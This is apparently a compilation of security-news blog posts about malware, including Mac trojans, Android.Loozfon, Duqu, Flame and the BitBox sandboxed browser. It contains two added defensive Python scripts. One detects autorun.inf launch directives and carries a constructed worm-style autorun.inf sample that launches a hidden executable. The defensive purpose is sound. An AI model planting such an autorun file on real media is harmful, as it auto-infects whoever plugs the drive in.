
Microsoft Discovered a New Malware Targeting Apple OS X Exploiting Office Vulnerability


This year is going from bad to worse for Mac users. Earlier we saw more than 600,000 Mac users infected by the Flashback Trojan, and after that another Mac Trojan, "Backdoor.OSX.SabPub", penetrated Mac security. Recently Microsoft has detected a new piece of malware targeting Apple OS X computers that exploits a vulnerability in the Office productivity suite patched nearly three years ago. The malware is not widespread, according to Jeong Wook Oh of Microsoft's Malware Protection Center. But it does show that attackers pay attention when people do not apply patches as those fixes are released, putting their computers at a higher risk of becoming infected.
The exploit discovered by Microsoft doesn't work on OS X Lion, but does work on Snow Leopard and prior versions. Oh wrote that it is likely the attackers have knowledge about the computers they are attacking, such as the victim's operating system version and patch level. The malware delivered by the exploit is written specifically for OS X and is basically a "backdoor", a tool that allows remote control of a computer. Microsoft advised those who use Microsoft Office 2004 or 2008 for Mac or the Open XML File Format Converter for Mac to ensure those products have the patch applied.


-Source (Computer World)  


USB Immunizer: Anti-Malware Tool Against Autorun Viruses!



The USB Immunizer is BitDefender's response to this growing issue.
Autorun-based malware has been at the top of the worldwide e-threat landscape, with notorious representatives such as Trojan.AutorunInf, the Conficker worm (Win32.Worm.Downadup) and Worm.Autorun.VHD. We have to agree with that: many of us get infected by some silly malware simply by plugging in a friend's or neighbour's USB stick, DVD, etc.

Introduced back in the Windows XP era to facilitate software installations from CD-ROM media for non-technical computer users, the Autorun feature has rapidly become the infection vector of choice for cyber-criminals.
The Immunize option allows you to immunize your USB storage device or SD card against infections with autorun-based malware. Even if your storage device has been plugged into an infected computer, the piece of malware will be unable to create its autorun.inf file, thus annihilating any chance of auto-launching itself.
The Immunize Computer slider allows you to toggle the autorun feature On or Off for any removable media (except for CD/DVD-ROM devices). If you accidentally plug in an infected USB drive that has not been immunized, the computer will not auto-execute the piece of malware located on the USB storage device.
Download USB Immunizer here
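To make the mechanism above concrete, here is an added example (not code from BitDefender's tool or from the original post) that inspects a removable-media root the way a defender would: it tells apart a missing autorun.inf, an autorun.inf that exists as a directory (the immunized state described above, which stops malware from creating the file), and an autorun.inf file whose directives would auto-launch an executable. The autorun.inf samples, the folder names and the verdict labels are constructed for illustration and are assumptions of this example.

```python
"""Classify what sits at the root of a removable drive as autorun.inf.
Added example; the sample autorun.inf contents below are constructed,
and modelling 'immunized' as 'autorun.inf exists as a directory' is an
assumption of this example, not a description of BitDefender's internals."""
import os
import tempfile

# Directives that make Windows launch something automatically on insertion.
LAUNCH_KEYS = {"open", "shellexecute"}
EXEC_SUFFIXES = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js")


def parse_autorun(text):
    """Parse the [autorun] section into a dict of lowercase key -> value."""
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):          # skip blanks and comments
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def find_launch_directives(entries):
    """Return (key, value) pairs that would auto-launch a program."""
    hits = []
    for key, value in entries.items():
        # open=, shellexecute=, and shell\<verb>\command= all run something.
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            hits.append((key, value))
    return hits


def classify_root(root):
    """Return (verdict, launch_hits) for a drive root: clean, immunized, suspicious, present."""
    path = os.path.join(root, "autorun.inf")
    if not os.path.lexists(path):
        return "clean", []
    if os.path.isdir(path):
        # A directory named autorun.inf cannot be replaced by a file of the same name.
        return "immunized", []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        entries = parse_autorun(fh.read())
    hits = find_launch_directives(entries)
    for _, value in hits:
        if value.strip():
            target = value.strip().split()[0].strip('"').lower()
            if target.endswith(EXEC_SUFFIXES):
                return "suspicious", hits
    return "present", hits


# Constructed samples: one mimicking a worm's dropped file, one a harmless label.
SAMPLE_MALICIOUS = """[autorun]
; constructed sample for this example
open=RECYCLER\\setup.exe
shellexecute=RECYCLER\\setup.exe
shell\\open\\command=RECYCLER\\setup.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
"""

SAMPLE_BENIGN = """[autorun]
icon=drive.ico
label=Backup Drive
"""


def demo():
    """Build four constructed drive roots in a temp dir and classify each."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, content in (("infected", SAMPLE_MALICIOUS), ("labelled", SAMPLE_BENIGN)):
            root = os.path.join(tmp, name)
            os.mkdir(root)
            with open(os.path.join(root, "autorun.inf"), "w", encoding="utf-8") as fh:
                fh.write(content)
            results[name] = classify_root(root)[0]
        root = os.path.join(tmp, "immunized")
        os.makedirs(os.path.join(root, "autorun.inf"))   # folder, not file
        results["immunized"] = classify_root(root)[0]
        root = os.path.join(tmp, "clean")
        os.mkdir(root)
        results["clean"] = classify_root(root)[0]
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:10s} -> {verdict}")
```

Pointing `classify_root` at a real drive letter or mount point gives the same verdicts; the "immunized" case is the state the Immunize option leaves a stick in, and "suspicious" is what the Immunize Computer slider protects against when autorun is switched off.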


Security experts can't verify Iran's claims of new worm

 
Without a sample of the new worm that an Iranian official says attacked the country's computers, it's impossible to verify his claims, a security researcher said Monday.
Kevin Haley, the director of Symantec's security response group, said that his team has not found an example of the worm, dubbed "Stars" by the Iranian military commander responsible for investigating Stuxnet, the sophisticated malware that attacked the country's uranium enrichment facilities beginning in June 2009.
"Generally, samples [of malware] do get traded among security vendors," said Haley, explaining that when one antivirus company lacks malware it wants to analyze, it asks other firms to share their samples. "[Iran] makes this a little more difficult, because we have no direct relationships there," added Haley. "But perhaps someone else does."
Although Symantec has asked researchers in other companies if they have a sample, as of late Monday it has not been able to acquire one.
No other security vendor has stepped forward to say it has a copy of Stars.
Security experts need the malware to corroborate claims by Brigadier Gen. Gholam Reza Jalali, the head of Iran's Passive Defense Organization, the military unit that defends the country's nuclear program.
On Monday, Jalali told Iran's Mehr News Agency that the Stars worm had been detected and thwarted, but provided no information on its function or targets, or when it was discovered.
Jalali's claim came just a week after he blamed Siemens for helping U.S. and Israeli teams create Stuxnet.
Stuxnet, which targeted industrial control systems manufactured by Siemens, has been called a "groundbreaking" piece of malware because it used multiple "zero-day" vulnerabilities, hid while it wreaked havoc on Iran's uranium enrichment hardware, and required enormous resources to create.
It's possible that Stars was not a targeted attack aimed at Iran, but simply part of a more traditional broad-based assault, said Haley.
"It could be a mass attack that got through their defenses," he said. "That could have raised the alarm. They're already paranoid about attacks."
Symantec sees millions of threats every day, the vast majority of which are not targeted, Haley said.
If that's the case, trying to identify Stars would be impossible. "In the case of Stuxnet, we actually had samples, we just didn't understand the significance of the threat until later," Haley said. "Finding [Stars] in our database would be like finding a needle in a haystack" without more information from Iran.
"And even if we found something, we wouldn't know if it was the one they're talking about," said Haley.
Other antivirus vendors, including Helsinki-based F-Secure and U.K. security company Sophos, also acknowledged that they could not verify Iran's claims.
"We can't tie this case to any particular sample we might already have," admitted Mikko Hypponen, F-Secure's chief research officer, in a blog post Monday. "We don't know if Iran[ian] officials have just found some ordinary Windows worm and announced it to be a cyber war attack."
Graham Cluley, a senior security technology consultant at Sophos, also said his company had not been able to identify the malware.


'Dockster' A New Mac Malware Targeting Apple Users Found on Dalai Lama Related Website


Researchers at F-Secure have identified a new piece of malicious software targeted at Apple users on a website dedicated to the Dalai Lama. According to the F-Secure blog post, the Dalai Lama related website is fully compromised and is pushing new Mac malware, called Dockster, using a Java-based exploit. Dockster tries to infect computers by exploiting a vulnerability in Java, CVE-2012-0507. The vulnerability is the same one used by the Flashback malware, which first appeared around September 2011 and infected as many as 600,000 computers via a drive-by download. Flashback was used to fraudulently click on advertisements in order to generate illicit revenue in a type of scam known as click fraud. Apple patched the vulnerability in Java in early April and then undertook a series of steps to remove the frequently targeted application from Macs. Apple stopped bundling Java in the 10.7 version of its Lion operating system, which continued with the company's Mountain Lion release. In October, Apple removed older Java browser plug-ins in a software update.
The relief is that current versions of OS X are not vulnerable; users who have disabled the Java browser plug-in are also not vulnerable. F-Secure researcher Sean Sullivan said Dockster is "a basic backdoor with file download and keylogger capabilities." Sullivan also said that the Dalai Lama's site is serving a Windows-based exploit for CVE-2012-4681, the Agent.AXMO Trojan. The Trojan exploits a Java vulnerability that allows remote code execution using a malicious applet that is capable of bypassing the Java SecurityManager.

Please Note That: The gyalwarinpoche.com site doesn't seem to be as "official" as dalailama.com

While talking about Mac malware, remember that Mac users have faced such attacks before: the Mac Trojan OSX.SabPub was spreading through Java exploits; in 2011 we also saw the OSX/Revir-B Trojan installed behind a PDF, giving hackers remote access to Mac computers; and besides Revir-B, the Linux Tsunami Trojan called "Kaiten" targeted Mac OS users in 2011. Another malware named "Devil Robber" also made Mac users victims by stealing their personal information. In the very recent past we have seen a Trojan named 'BackDoor.Wirenet.1' apparently providing its masters with a backdoor into infected systems. It is also capable of stealing passwords stored in browsers like Chrome, Chromium, Firefox and Opera. For any kind of cyber updates and infosec news, stay tuned with VOGH.






Android Malware 'Loozfon' Targeting Female Android Users -Said Symantec


We are very familiar with malware that targets men by enticing them to view videos or pictures of a sexually oriented nature. But here the story is totally different: antivirus firm Symantec has recently discovered 'Android.Loozfon', a rare example of malware that targets female Android users.
According to the Symantec official blog, a group of scammers is attempting to lure female Android users in Japan into downloading an app by sending emails stating how the recipient can easily make some money. The email includes a link to a site that appears to be designed to help women make money simply by sending emails. When a certain link on the site is clicked, Android.Loozfon is downloaded onto the device. Other links direct the user to a dating service site that likely attempts to charge money to use the service, which supposedly helps women meet rich men.



If this trick does not work, the criminal group has another trick up its sleeve. It also sends spam that states that the sender of the email can introduce the recipient to wealthy men. When the link included in the body of the email is clicked, the malware is automatically downloaded onto the device. The downloaded app is titled “Will you win?” in Japanese. It has nothing to do with earning extra income or wealthy men.

If the app is installed and launched, it counts down from two to zero and then states that the user has lost. The app is programmed to lose every time, although there is nothing to either lose or win. It steals contact details stored on the device as well as the phone number of the device, which is the main goal of the malware. The scammers are likely harvesting email addresses in order to send spam to the contacts they were able to steal to lure them to the dating service site and/or sell the data to another group of spammers.






Suspected Russian Hacker Behind Cyber Attack on Georgia Caught on His Webcam 

It is said that there may be a hundred ways to commit a crime, but a hundred and one chances of getting busted. Exactly that happened to a Russian hacker who was behind a cyber attack against the country of Georgia. Since 2011 Georgia has been complaining that Russian hackers are disturbing its cyberspace by attacking its computer networks, injecting malicious code into websites, and planting spyware to steal classified information. After discovering that a cyber-spy was infecting government computers with malware designed to mine important documents, government officials decided to fight fire with fire. They intentionally allowed the malicious software to infect one particular computer, and baited it with a ZIP file called "Georgian-Nato Agreement", exactly the sort of thing they knew the intruder would be looking for. Instead of important documents, however, the bait file was loaded with the hacker's own malware. Once the hacker downloaded and opened the file, the software went to work stealing his documents and, best of all, hijacking his webcam to capture clear video of his face. According to the CERT-Georgia report, an analysis of the attack's command-and-control center revealed that at least 390 computers were infected in the attack. 70% of compromised PCs were based in Georgia, with other victims found in the USA, Canada, Ukraine, France, China, Germany and Russia. Computers hit in Georgia were predominantly based in government agencies, banks and critical infrastructure, the report claims.
In a 27-page report, the Georgian government explains in detail how, in early 2011, Georgian news websites were hacked in order to exploit vulnerabilities and spread malware that hijacked infected computers and searched for sensitive documents.
According to a report by Naked Security, Georgian officials laid a trap. Georgia's CERT deliberately infected one of its own PCs with the malware, and planted a ZIP file named "Georgian-Nato Agreement" on its drive, hoping it would prove irresistible to the hacker. Sure enough, the hacker stole the archive file and ran the malware that Georgia's CERT had planted inside, meaning that investigators now had control over the hacker's own computer. This made it relatively easy to capture images of the suspect at work in front of his PC. The CERT researchers claim that they also found a Russian email conversation on the suspect's computer in which he gives instructions on how to use his malware and infect targets. Furthermore, the suspected hacker's city, ISP, email address and other information were also acquired. Curiously, a domain used by the attackers was registered to an address in Moscow belonging to the Russian Ministry of Internal Affairs, department of logistics, which just happens to be based close to the Russian Secret Service (FSB). Furthermore, according to CERT-Georgia, websites used to control the infected Georgian computers have links with RBN, the notorious Russian Business Network.




TeamSpeak Official Forum Hacked! Infecting Users By Malicious DotCache Exploit Kit
A serious security breach has compromised the official forum of TeamSpeak. According to sources, hackers gained access to the server and injected a malicious script into the landing page of the official TeamSpeak forum. Expert malware analysts have figured out that the attack was thoroughly planned in order to infect millions of users by redirecting them to a DotCache exploit kit landing page, as illustrated below.
TeamSpeak is a very famous Brazilian company that offers VoIP software allowing computer users to speak on a chat channel with fellow computer users, much like a telephone conference call. Users use the TeamSpeak client software to connect to a TeamSpeak server of their choice; from there they can join chat channels and enjoy the excellent VoIP service. It is mostly used by millions of gamers across the globe.
Basically we can consider TeamSpeak a high-value target, and so did the hacker. Researchers said that the exploit kit landing page is hosted on atvisti.ro, a forum for ATV enthusiasts that has also been compromised. In a statement, well-known malware analyst and security researcher Jerome Segura said that if the Java exploit succeeds, the final payload is loaded. In this particular example, the payload was the ZeroAccess Trojan, which Malwarebytes Anti-Malware detects as Rootkit.0Access. A small relief is that the malware has not yet been spotted in the wild. According to VirusTotal statistics, only 7 of 46 leading antivirus engines detect this type of malware. Exactly as with TeamSpeak, a few days earlier Kahu Security researchers uncovered a similar compromise on the forum of the Nissan Pathfinder Off Road Association (NPORA); in both cases, JJEncode was used to obfuscate the malicious script. To avoid further infections, the TeamSpeak forum has already been informed and, as expected, they have overcome this issue. For a detailed analysis of the above malware you can visit the official blog post of Malwarebytes.




The Nitro Attacks Stealing Secrets from the Chemical Industry


Symantec has prepared a report on an ongoing malware campaign and named it "Nitro Attacks". Using it, an attacker can pull secret information from chemical industry companies; the attack is mainly based on social engineering.
An analysis report says:
This "nitro" attack has an interesting blend of malware techniques that does show some ingenuity. It used a socially engineered email message with a malicious attachment. While the malware component of the attack was a recycled version of the common remote access Trojan (RAT) PoisonIvy, it was often packaged in an encrypted archive to evade email gateway detection. Nitro portrayed itself as a necessary Adobe Flash or anti-virus update, using your desire to be secure to trick you into installing the malware. Like many other targeted attacks that have come to light recently, this one attacks our weakest link, our humanity.
One of the behaviors of the Trojan was to collect password hashes from compromised Windows computers. If you haven't already gotten the memo, it is an extremely bad idea to give your users administrative rights.
Malware cannot access the Windows cache of passwords, which almost always has admin credentials included, if it does not have administrative rights. Simply restricting permissions would be enough to stunt the spread of an attack like this. Additionally, the behavior of this malware is quite easy for HIPS or behavioral anti-virus to detect and block. With the multitude of techniques being used by the bad guys, analyzing the behavior of applications is critical.
The command and control for this Trojan was located on a virtual hosted server in the United States. Symantec's investigation shows that the person who owns this instance, Covert Grove, is based in the Hebei region of China. In too many high profile organizations, IT security and their users have an adversarial relationship. Additionally, IT often does not use the full capabilities of the tools they are purchasing out of fear of false positives. Blocking suspicious attachments, using proactive detection technologies and educating users could all stop this type of attack from succeeding. If you weren't one of the victims, this is a great lesson on what you should be doing to protect against the next attack.

For more info and to download the Symantec report click Here


Duqu, The Next-Generation Cyber Attack Weapon



Researchers have raised an alarm over a new piece of malware with "striking similarities" to Stuxnet, the mysterious computer worm that targeted nuclear facilities in Iran. The new malware, identified as Duqu, is a highly specialized Trojan capable of gathering intelligence data and assets from entities, such as industrial control system manufacturers, in order to more easily conduct a future attack against another third party.
“The attackers are looking for information such as design documents that could help them mount a future attack on an industrial control facility,” according to Symantec’s security response team. 
Symantec said it got a copy of the in-the-wild malware from an unnamed research lab with strong international connections. The company found that parts of Duqu are “nearly identical to Stuxnet” but noted that the malware has a completely different goal.
Duqu is essentially the precursor to a future Stuxnet-like attack. The threat was written by the same authors (or those that have access to the Stuxnet source code) and appears to have been created after the last recovered Stuxnet file. Duqu’s purpose is to gather intelligence data and assets from entities, such as industrial control system manufacturers, in order to more easily conduct a future attack against another third party. The attackers are looking for information such as design documents that could help them mount a future attack on an industrial control facility.
The company said Stuxnet and Duqu shared the same modular structure, injection mechanisms, and a driver that is digitally signed with a compromised key. Unlike Stuxnet, Symantec said, the new malware does not contain any code related to industrial control systems. It was built to be a remote access Trojan (RAT) that does not self-replicate.
“The threat was highly targeted toward a limited number of organizations for their specific assets. However, it’s possible that other attacks are being conducted against other organizations in a similar manner with currently undetected variants,” Symantec warned.
The attackers used Duqu to install another infostealer that could record keystrokes and gain other system information. The attackers were searching for assets that could be used in a future attack. In one case, the attackers did not appear to successfully exfiltrate any sensitive data, but details are not available in all cases. Two variants were recovered and, in reviewing our archive of submissions, the first recording of one of the binaries was on September 1, 2011. However, based on file compile times, attacks using these variants may have been conducted as early as December 2010.
Note that Duqu uses HTTP and HTTPS to communicate with a command and control server which is currently operational.

To know more about Duqu and to see the similarities between Stuxnet and Duqu Click Here


-News Source (ZDNet, Yahoo, Symantec)



An army of techies waging war on spam




It's a vast, invisible battle, going on all the time - and, unbeknownst to you, your computer may be one of the battlegrounds.
The struggle pits thousands of smart, evil folks, who send out trillions of pieces of spam e-mail, against the people in law enforcement and business guarding against them and trying to shut them down.
On the front lines against spam and cybercrime, some analyze malicious computer code (malware), and others - in the young science of cyberforensics - examine computers and drives confiscated in investigations.
Spam - hated word - is again in the news. A May 3 FBI alert warned of e-mail carrying purported images or videos of Osama bin Laden. "This will leave you speechless)," the spam says. "See picture of bin laden dead!"
Don't even open it, warned the alert. "This malicious software or malware can embed itself in computers and spread to users' contact lists, thereby infecting the systems of associates, friends, and family members."
Pumped out by networks (botnets) of malware-enslaved personal computers, unwanted e-mail - random junk, ads, porn, viruses, Trojan horses, get-rich-quick offers from Nigerian nobility - makes up most of all e-mail sent in the world. By far. Estimates range around 80 percent - but a 2007 Microsoft security report in October put it at 97 percent. It ranges from crud to criminal. As for malware, the United States has about 2.2 million computers (more than any other country) infected, according to Microsoft numbers (likely to be low).
"I guarantee," says FBI Special Agent Brian Herrick, director of the FBI Cyber Crime Squad in Philadelphia, "that thousands of Inquirer readers probably have computers infected with spam or malware, part of a botnet just pumping out spam."
The cyberthugs have an advantage, says Special Agent Cerena Coughlin, also of the Cyber Crime Squad. "We can stop them for a while, but they always come up with ways to circumvent it. And we're more restricted. We have to follow the letter of the law - they don't."
The extent of it is staggering. Before U.S. marshals took it down in March, the Rustock botnet was pumping out an estimated 30 billion spam e-mails a day. The botnets - big names include ZeuS, SpyEye, Dogma, Koobface, and Alureon - are run by criminal groups that use servers and supercomputers in several countries. Tracing their activity is extremely difficult and calls for highly skilled technical workers.
One of 16 such FBI squads in the country, the Philadelphia Cyber Crime Squad has 15 agents working full-time on cybercrime; the national program began in 1996. Working with national and international agencies, the squad studies and traces viruses, junk, and spam. Cases involve computer intrusions (everything from local hackers to international cyberespionage and terrorism), child exploitation (as in pornography), intellectual-property rights (copyright infringement, movies, music, software, proprietary business secrets), Internet fraud, and identity theft.
Coughlin says, "We are insanely busy. This is the third-busiest squad in the country, because of where it is and all the affected business and government concerns nearby. We don't have enough bodies for all the work there is."
In the Philadelphia area, the FBI joins hands with local businesses such as banks, agribusiness, and utilities (enterprises often attacked by spam and cybercrime) in a group called InfraGard. There are more than 1,400 local members - "So many people want to be part of it that we don't even need to solicit members," Coughlin says.
At monthly meetings, members share information, news, and tips. The FBI gives presentations and talks, and individual members speak about the cases they face. "It's a communication channel," Herrick says, "between the U.S. government and people in industry down in the trenches, looking to protect critical infrastructure."
Current president of the local chapter of InfraGard is Brian Schaeffer, chief information officer of Liberty Bell Bank in Marlton. He says, "I get thousands of cyberattacks a day. A lot of them are idiots just wanting to show what they can do. But a lot of them are looking to access banking information."
Like most banks, Liberty Bell has a strong firewall, "so hackers take a back-door approach," sending bank clients "phishing" e-mails - which pretend to be trustworthy communications but hide nasty intentions. "If a client even opens such an e-mail, they can get into their account information, their contacts, the keys to the kingdom."
Such attacks mean that "not only do I have to defend my own system, but also I try to help the customers with theirs. If their computers get infected, their account and credit information could get sold to strangers, and that could hurt us all." Schaeffer tells of an elderly couple who came to his bank one day, and just by coincidence, a bank clerk brought him a suspicious request "to withdraw a huge amount of money from their account - but there they were, sitting with us, so we knew some hackers had got at their information through e-mail."
He says InfraGard "has given me a network of people I can go to if I see things I never saw before. If I have a question, there's likely to be someone with an answer."
The other side of the battle is cyberforensics. Think of it as CSI with computers. It's happening right now, with the cache of computers, flash drives, and other cyberstuff taken from Osama bin Laden's compound in Abbottabad, Pakistan. U.S. agents instantly began to analyze this precious trove for criminal evidence - and links to other al-Qaeda operatives.
Work much like this goes on in Radnor at the FBI's Regional Computer Forensics Laboratory, one of 16 such labs in the country. As with InfraGard, the flavor is distinctly federal/local. Law enforcement agencies - such as the police departments of Philadelphia, Lancaster, Lower Merion, and Lower Providence - send officers to guest-work at the lab and receive training and experience in fighting computer crime.
Supervisory Special Agent J.P. McDonald directs the lab, which has been involved in some of the highest-profile local investigations of recent years, including the 2007 Fort Dix attack plot, the manhunt for the Coatesville arsonists, the case of former State Sen. Vincent J. Fumo, and the 2007-08 "Bonnie and Clyde" case of Jocelyn Kirsch and Edward Anderton, now in prison for fraud and identity theft.
"You can track the growth of cyberforensics along the same timeline as computers," McDonald says. "The FBI's program began in 1999, and, as of the mid-2000s, cyberevidence now has recognition and a firm track record in courts."
The lab is a techie's paradise, with gadgets and screens galore, racks of digital evidence sealed in antistatic wrap, sophisticated hard-drive readers, radiofrequency-shielded spaces, and kiosks for quick analysis of cell phones and thumb drives. "The majority of what we do," McDonald says, "is analysis of what's in a machine, how it got there, and then making a timeline of the history of what got there when."
"People's electronic devices are really an extension of their thoughts," says Philadelphia Police Lt. Edward Monaghan, deputy director of the lab. "If you're into NASCAR, you're likely to have NASCAR stuff in your computer. Thugs who are into drugs and money like to have their pictures taken with drugs, guns, and money. It sounds dumb, but they love it. That's what cyberevidence is all about."
The FBI's Herrick is resigned to a long battle: "There's probably some high school kid someplace in the Midwest - or maybe Europe or Asia someplace - who's cooking up something nobody's ever seen before. You really have to stay on your game with these guys."




The World's Safest Browser: BitBox



There is no such thing as an entirely secure browser. Let's be realistic: you will always need a good portion of common sense and Internet smarts to avoid nasty attacks and hijacks.

However, if you are paranoid about security, there is one browser that will reliably protect you from virtually all threats. It's a browser you already know: Firefox 4.0.1. Well, a boxed version of Firefox 4.0.1.
I am not exactly an adventurous Internet user as far as the dark corners of the web are concerned. Just as I am not the kind of person to enjoy the silence of a dark alley in Chicago's south suburbs after dawn, I typically avoid websites I don't generally trust. I have had my fair share of spyware, trojans and other malware that caused me quite a bit of headache in the past, and I am just more cautious than I was 10 years ago. Yet that might change. I have just discovered a bulletproof wrapper for Firefox and, at least for now, I don't care that much anymore what is happening below the content the browser shows. There might be lots of malware and I really don't care anymore.
The reason is that I have started using BitBox as my browser for my general work-related tasks. BitBox is essentially a heavily armored version of Firefox 4.0.1 that is encased in Oracle's VirtualBox virtual machine (VM) environment that houses a secured Debian 6 Linux OS. That sounds relatively complicated, but once it is installed, this secure version of Firefox works just like a regular version of the browser. The difference is that it runs in a virtualized environment that is separate from your Windows XP/Vista/7.

The upside clearly is that you are dealing with a self-contained package. If you click on something malicious, the usual EXE files cannot be executed in your Linux VM. You can download files, but they will not directly affect your Windows system and need to be manually moved out of the VM, if you have connected the drives. Malware that infects Firefox during your session is automatically deleted the next time you start BitBox, as it always starts with its default configuration, the way it was installed. However, phishing attacks that target your personal data and may trick you into providing critical information will still require some common sense; the sandbox will not protect you from the effects of such actions.
There are a few downsides. First, it is a hefty 990 MB download, and the installed software needs almost 2 GB of disk space, since the package bundles Oracle's VirtualBox together with a Debian 6 installation. Because the VM is reset to its default state every time it starts, nothing you change persists, which makes it less than convenient as an everyday consumer browser. The deal breaker is the language. The software was developed for the German government and, while it is a free download, it is only available in German. Without basic German the installation is a high hurdle, and even then everyday use may be uncomfortable.
The installation of the entire package is documented in a PDF and is fairly straightforward, but some knowledge of virtual machines and virtualization in general helps when the individual components are installed; you want to understand what is happening on your PC and what effect a configured virtual drive has. Other than that, I was able to install BitBox within 15 minutes, once it was downloaded. The only criticism I would have is that developer Sirrix is not using the most recent version of Oracle's VirtualBox (4.0.4 vs. 4.0.6). Custom configuration options include a dedicated download folder, a separate malware scanner, random root passwords for the virtual machine and proxy settings. During installation, the software creates a Linux guest (running Firefox) inside VirtualBox. Typically you would run the guest from within VirtualBox, but Sirrix has trimmed the whole process down to a single icon on the desktop.
I briefly mentioned it: this is not a browser to get deeply emotional about or to discuss performance features, but the concept is very compelling as far as browser safety is concerned. Plain browsing tasks make a lot of sense in such a package. In fact, I wonder why such versions aren't offered by Mozilla, Google, Opera and Microsoft by default. 
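The reset-on-start and download-folder behaviour described above can be reproduced with stock VirtualBox. The script below is an added example written for this post, not Sirrix's BitBox code. It assumes VBoxManage is on the PATH, that a VM named bitbox-firefox exists with a snapshot named clean taken right after the browser was installed, and an assumed host download directory. Each launch stops the guest, rolls it back to the clean snapshot, re-attaches a single shared folder for downloads and starts it again; the VMState parser is exercised against a constructed sample of showvminfo output.

```python
"""Disposable-browser launcher in the BitBox style: roll the guest back to a clean
snapshot, expose exactly one host folder for downloads, start it.
Added example, not Sirrix's BitBox code.  Assumptions: VBoxManage is on the PATH,
a VM named "bitbox-firefox" exists, and a snapshot "clean" was taken right after the
browser was installed."""
import re
import subprocess
from typing import List

VM_NAME = "bitbox-firefox"                       # assumed VM name
CLEAN_SNAPSHOT = "clean"                         # assumed post-install snapshot
DOWNLOAD_FOLDER = "/home/user/bitbox-downloads"  # assumed host directory for kept downloads

# VMState="running" / "poweroff" / "saved" / "paused" as printed by showvminfo
_STATE_RE = re.compile(r'^VMState="([^"]+)"$', re.M)

# Constructed, trimmed sample of `VBoxManage showvminfo <vm> --machinereadable` output
SAMPLE_SHOWVMINFO = '''name="bitbox-firefox"
groups="/"
ostype="Debian (64-bit)"
VMState="running"
VMStateChangeTime="2011-06-01T10:00:00.000000000"
'''


def parse_vm_state(showvminfo_output: str) -> str:
    """Return the VMState value from machine-readable showvminfo output."""
    match = _STATE_RE.search(showvminfo_output)
    if not match:
        raise ValueError("VMState not found in showvminfo output")
    return match.group(1)


def build_launch_plan(vm: str, snapshot: str, download_dir: str,
                      state: str) -> List[List[str]]:
    """VBoxManage invocations that take the VM from `state` to a fresh session.

    Snapshot restore and shared-folder changes require a powered-off VM, so a
    running, paused or saved machine is stopped first and its state discarded:
    resuming it would carry over whatever the last page left behind."""
    plan: List[List[str]] = []
    if state in ("running", "paused"):
        plan.append(["VBoxManage", "controlvm", vm, "poweroff"])
    elif state == "saved":
        plan.append(["VBoxManage", "discardstate", vm])
    # Everything the previous session wrote (dropped malware, tampered profile,
    # rogue extensions, and also bookmarks) disappears with the restore.
    plan.append(["VBoxManage", "snapshot", vm, "restore", snapshot])
    # The one host directory the guest can reach; re-added so the path is always current.
    plan.append(["VBoxManage", "sharedfolder", "remove", vm, "--name", "downloads"])
    plan.append(["VBoxManage", "sharedfolder", "add", vm, "--name", "downloads",
                 "--hostpath", download_dir, "--automount"])
    plan.append(["VBoxManage", "startvm", vm, "--type", "gui"])
    return plan


def run_plan(plan: List[List[str]]) -> None:
    for cmd in plan:
        # Removing a shared folder that does not exist yet is not worth aborting over.
        tolerate_failure = cmd[1:3] == ["sharedfolder", "remove"]
        subprocess.run(cmd, check=not tolerate_failure)


def launch(vm: str = VM_NAME, snapshot: str = CLEAN_SNAPSHOT,
           download_dir: str = DOWNLOAD_FOLDER) -> None:
    info = subprocess.run(["VBoxManage", "showvminfo", vm, "--machinereadable"],
                          check=True, capture_output=True, text=True).stdout
    run_plan(build_launch_plan(vm, snapshot, download_dir, parse_vm_state(info)))


if __name__ == "__main__":
    launch()
```

Only the downloads folder crosses the boundary; a compromised Firefox profile, or anything else the session wrote, is thrown away by the snapshot restore. A saved or running VM is powered off rather than resumed, because a resumed session would carry over whatever the previous page left behind. What this script does not do is harden the guest itself; that is the part BitBox's prepared Debian image supplies.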


USA Accused For Planting "Flame" Malware to Hack France President's Network

The well-known French newspaper L'Express has accused the United States of using the "Flame" cyber weapon to break into computer networks inside France's presidential palace, the Elysee. In its report, L'Express published details of what it claims was a sophisticated state-sponsored intrusion into the offices of the French presidency earlier this year, carried out to steal data. According to the newspaper, the attack took place in May 2012, shortly before the second round of the French presidential election, but was kept secret until now. The attackers reportedly found their targets on Facebook, identifying people working inside the Elysee and befriending them on the social network. That social engineering laid the groundwork for the next phase: the victims were sent links to a fake Elysee intranet login page, where their credentials were harvested. With those credentials, it is alleged, malware was installed on the network, infecting computers belonging to senior political advisors, including Xavier Musca, Secretary-General of Nicolas Sarkozy's office. The United States Embassy in Paris has denied any involvement in hacking its ally. “We categorically refute allegations of unidentified sources,” embassy spokesman Mitchell Moss told l’Express. “France is one of our best allies. Our cooperation is remarkable in the areas of intelligence, law enforcement and cyber defense. It has never been so good and remains essential to achieve our common fight against extremist threat.” Secretary of Homeland Security Janet Napolitano, however, did not deny that the U.S. was involved. 
She told l’Express: “We have no greater partner than France, we have no greater ally than France. We cooperate in many security-related areas. I am here to further reinforce those ties and create new ones.”

While we are on the subject of Flame, a reminder: after the Duqu episode, in the middle of this year the Iranian Computer Emergency Response Team (MAHER) claimed to have discovered a new piece of targeted malware, described by some as a new Stuxnet, attacking the country's internal systems. The newly found threat was dubbed Flame (also known as Flamer or Skywiper). Flame, the next-generation cyber weapon also nicknamed 'The Super Spy', has fascinated the security industry with its sophistication and versatility, a Swiss-Army knife of cyber-espionage. Microsoft later confirmed that Flame components were signed with certificates that chained up to Microsoft's root, which let the malware impersonate Windows Update (WU) and Windows Server Update Services (WSUS) to spread to other machines on a local network; Microsoft's own update servers were not infected. Since then the name 'Flame' has come up in many contexts. 


-Source (NS & threatpost)


MYSQL.com Compromised & Giving Malware Warning


